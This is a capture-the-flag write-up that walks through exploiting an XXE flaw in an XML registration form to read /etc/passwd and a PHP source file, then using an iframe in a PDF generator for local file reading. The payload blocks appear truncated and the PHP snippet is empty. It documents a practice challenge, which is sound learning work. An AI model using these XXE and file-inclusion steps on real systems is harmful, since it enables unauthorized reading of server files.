Tags: lfi xxe web
Rating: 5.0
# Include me
## Description
> Zero Dollar Security is hiring infosec enthusiast. Apply ASAP. Connect at chall.ctf-ehcon.ml:32104
## Solution
This application just has register function
Use Burp Suite to intercept the request.
- As we see, body of the request is XML
- The response has the `username` has sent before
--> This might contain XXE vulnerability
The first we try to read a file such as `/etc/passwd`
```xml
]>
<root>
<email>&ext;</email>
<password>none</password>
</root>
```
That's good, continue reading other files such as `flag.txt`, `flag.php`... but I get nothing.
When I'm trying to list directory, I receive a strange response having a newline character `\n`
Nice, use another method to read or list directory. Because I knew this application use `PHP`, therefore I use PHP wrapper to read file
- File `flag.php` is guessed
```xml
]>
<root>
<email>&ext;</email>
<password>none</password>
</root>
```
Okay good response, take this to base64 decode. Read this code a bit
- It takes param `content` in request using `POST` method
- Put `content` into created file with given `content`
- Pass 2 file `.html` and `.pdf` to `/var/www/html/files/`
```php
```
What did I get through this snippet code?
- We can put our payload into a file `html`
- A new directory `/var/www/html/files/`
Well, observer new directory a bit
Now, how can we capture the flag with controlable data HTML? Can we read file or list directory?
We can definately do it with `iframe` tag in HTML
--> LFI with iframe
Replace body of `POST` method from XML to `content`
My payload:
- Diretory listing of `/`
After send the request, F5 the application we will get new files
Nice, check out content of file `result.pdf`
Where is the flag? Ah, it's in `/ctf/`. List directory in `/ctf/`
The flag was captured ??
```
Flag is : EHACON{lf1_@nd_xx3_1s_fun}
```
